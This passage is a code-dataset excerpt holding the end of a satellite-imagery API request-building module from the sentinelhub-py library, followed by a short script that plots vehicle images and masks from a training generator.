mosaicking_order: MosaickingOrder | None = None,\n upsampling: ResamplingType | None = None,\n downsampling: ResamplingType | None = None,\n other_args: dict[str, Any] | None = None,\n ) -> InputDataDict:\n \"\"\"Generate the `input data` part of the request body\n\n :param data_collection: One of supported Process API data collections.\n :param identifier: A collection identifier that can be referred to in the evalscript. Parameter is referenced\n as `\"id\"` in service documentation. To learn more check\n `data fusion documentation `__.\n :param time_interval: A time interval with start and end date of the form YYYY-MM-DDThh:mm:ss or YYYY-MM-DD or\n a datetime object\n :param maxcc: Maximum accepted cloud coverage of an image. Float between 0.0 and 1.0. Default is 1.0.\n :param mosaicking_order: Mosaicking order, which has to be either 'mostRecent', 'leastRecent' or 'leastCC'.\n :param upsampling: A type of upsampling to apply on data\n :param downsampling: A type of downsampling to apply on data\n :param other_args: Additional dictionary of arguments. If provided, the resulting dictionary will get updated\n by it.\n :return: A dictionary-like object that also contains additional attributes\n \"\"\"\n input_data_dict: dict[str, Any] = {\n \"type\": data_collection.api_id,\n }\n if identifier:\n input_data_dict[\"id\"] = identifier\n\n data_filters = _get_data_filters(data_collection, time_interval, maxcc, mosaicking_order)\n if data_filters:\n input_data_dict[\"dataFilter\"] = data_filters\n\n processing_params = _get_processing_params(upsampling, downsampling)\n if processing_params:\n input_data_dict[\"processing\"] = processing_params\n\n if other_args:\n _update_other_args(input_data_dict, other_args)\n\n return InputDataDict(input_data_dict, service_url=data_collection.service_url)\n\n @staticmethod\n def bounds(\n bbox: BBox | None = None, geometry: Geometry | None = None, other_args: dict[str, Any] | None = None\n ) -> dict[str, Any]:\n \"\"\"Generate a `bound` part of the API request\n\n :param bbox: Bounding box describing the area of interest.\n :param geometry: Geometry describing the area of interest.\n :param other_args: Additional dictionary of arguments. If provided, the resulting dictionary will get updated\n by it.\n \"\"\"\n if bbox is None and geometry is None:\n raise ValueError(\"'bbox' and/or 'geometry' have to be provided.\")\n\n if bbox and not isinstance(bbox, BBox):\n raise ValueError(\"'bbox' should be an instance of sentinelhub.BBox\")\n\n if geometry and not isinstance(geometry, Geometry):\n raise ValueError(\"'geometry' should be an instance of sentinelhub.Geometry\")\n\n if bbox and geometry and bbox.crs != geometry.crs:\n raise ValueError(\"bbox and geometry should be in the same CRS\")\n\n crs = bbox.crs if bbox else geometry.crs # type: ignore[union-attr]\n\n request_bounds: dict[str, Any] = {\"properties\": {\"crs\": crs.opengis_string}}\n\n if bbox:\n request_bounds[\"bbox\"] = list(bbox)\n\n if geometry:\n request_bounds[\"geometry\"] = geometry.get_geojson(with_crs=False)\n\n if other_args:\n _update_other_args(request_bounds, other_args)\n\n return request_bounds\n\n def _get_base_url(self) -> str:\n \"\"\"It decides which base URL to use. Restrictions from data collection definitions overrule the\n settings from config object. In case different collections have different restrictions then\n `SHConfig.sh_base_url` breaks the tie in case it matches one of the data collection URLs.\n \"\"\"\n data_collection_urls = tuple({\n input_data_dict.service_url.rstrip(\"/\")\n for input_data_dict in self.payload[\"input\"][\"data\"]\n if isinstance(input_data_dict, InputDataDict) and input_data_dict.service_url is not None\n })\n config_base_url = self.config.sh_base_url.rstrip(\"/\")\n\n if not data_collection_urls:\n return config_base_url\n\n if len(data_collection_urls) == 1:\n return data_collection_urls[0]\n\n if config_base_url in data_collection_urls:\n return config_base_url\n\n raise ValueError(\n f\"Given data collections are restricted to different services: {data_collection_urls}\\n\"\n \"Configuration parameter sh_base_url cannot break the tie because it is set to a different\"\n f\"service: {config_base_url}\"\n )\n\n\nclass InputDataDict(dict):\n \"\"\"An input data dictionary which also holds additional attributes\"\"\"\n\n def __init__(self, input_data_dict: dict[str, Any], *, service_url: str | None = None):\n \"\"\"\n :param input_data_dict: A normal dictionary with input parameters\n :param service_url: A service URL defined by a data collection\n \"\"\"\n super().__init__(input_data_dict)\n self.service_url = service_url\n\n def __repr__(self) -> str:\n \"\"\"Modified dictionary representation that also shows additional attributes\"\"\"\n normal_dict_repr = super().__repr__()\n return f\"{self.__class__.__name__}({normal_dict_repr}, service_url={self.service_url})\"\n\n\ndef _get_data_filters(\n data_collection: DataCollection,\n time_interval: RawTimeIntervalType | None,\n maxcc: float | None,\n mosaicking_order: MosaickingOrder | None,\n) -> dict[str, Any]:\n \"\"\"Builds a dictionary of data filters for Process API\"\"\"\n data_filter: dict[str, Any] = {}\n\n if time_interval:\n start_time, end_time = serialize_time(parse_time_interval(time_interval, allow_undefined=True), use_tz=True)\n data_filter[\"timeRange\"] = {\"from\": start_time, \"to\": end_time}\n\n if maxcc is not None:\n if maxcc < 0 or maxcc > 1:\n raise ValueError(\"maxcc should be a float on an interval [0, 1]\")\n\n data_filter[\"maxCloudCoverage\"] = int(maxcc * 100)\n\n if mosaicking_order:\n data_filter[\"mosaickingOrder\"] = MosaickingOrder(mosaicking_order).value\n\n return {**data_filter, **_get_data_collection_filters(data_collection)}\n\n\ndef _get_data_collection_filters(data_collection: DataCollection) -> dict[str, Any]:\n \"\"\"Builds a dictionary of filters for Process API from a data collection definition\"\"\"\n filters: dict[str, Any] = {}\n\n if data_collection.swath_mode:\n filters[\"acquisitionMode\"] = data_collection.swath_mode.upper()\n\n if data_collection.polarization:\n filters[\"polarization\"] = data_collection.polarization.upper()\n\n if data_collection.resolution:\n filters[\"resolution\"] = data_collection.resolution.upper()\n\n if data_collection.orbit_direction and data_collection.orbit_direction.upper() != OrbitDirection.BOTH:\n filters[\"orbitDirection\"] = data_collection.orbit_direction.upper()\n\n if data_collection.timeliness:\n filters[\"timeliness\"] = data_collection.timeliness\n\n if data_collection.dem_instance:\n filters[\"demInstance\"] = data_collection.dem_instance\n\n return filters\n\n\ndef _get_processing_params(upsampling: ResamplingType | None, downsampling: ResamplingType | None) -> dict[str, Any]:\n \"\"\"Builds a dictionary of processing parameters for Process API\"\"\"\n processing_params: dict[str, Any] = {}\n\n if upsampling:\n processing_params[\"upsampling\"] = ResamplingType(upsampling).value\n\n if downsampling:\n processing_params[\"downsampling\"] = ResamplingType(downsampling).value\n\n return processing_params\n","repo_name":"sentinel-hub/sentinelhub-py","sub_path":"sentinelhub/api/base_request.py","file_name":"base_request.py","file_ext":"py","file_size_in_byte":9526,"program_lang":"python","lang":"en","doc_type":"code","stars":740,"dataset":"github-code","pt":"72"} +{"seq_id":"20657735855","text":"from datasets.vehicles import concat, crowdai, object_detect\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\n\nds = concat([object_detect, crowdai])\n\ntraining_gen = ds.generator(10)\nbatch_img, batch_mask = next(training_gen)\n### Plotting generator output\nfor i in range(10):\n im = np.array(batch_img[i], dtype=np.uint8)\n im_mask = np.array(batch_mask[i], dtype=np.uint8)\n plt.subplot(1, 3, 1)\n plt.imshow(im)\n plt.axis('off')\n plt.subplot(1, 3, 2)\n plt.imshow(im_mask[:, :, 0])\n plt.axis('off')\n plt.subplot(1, 3, 3)\n plt.imshow(cv2.bitwise_and(im, im, mask=im_mask))\n plt.axis('off')\n plt.show()","repo_name":"gregorej/computer-vision-playground","sub_path":"vehicle_recognition/train_generator_check.py","file_name":"train_generator_check.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}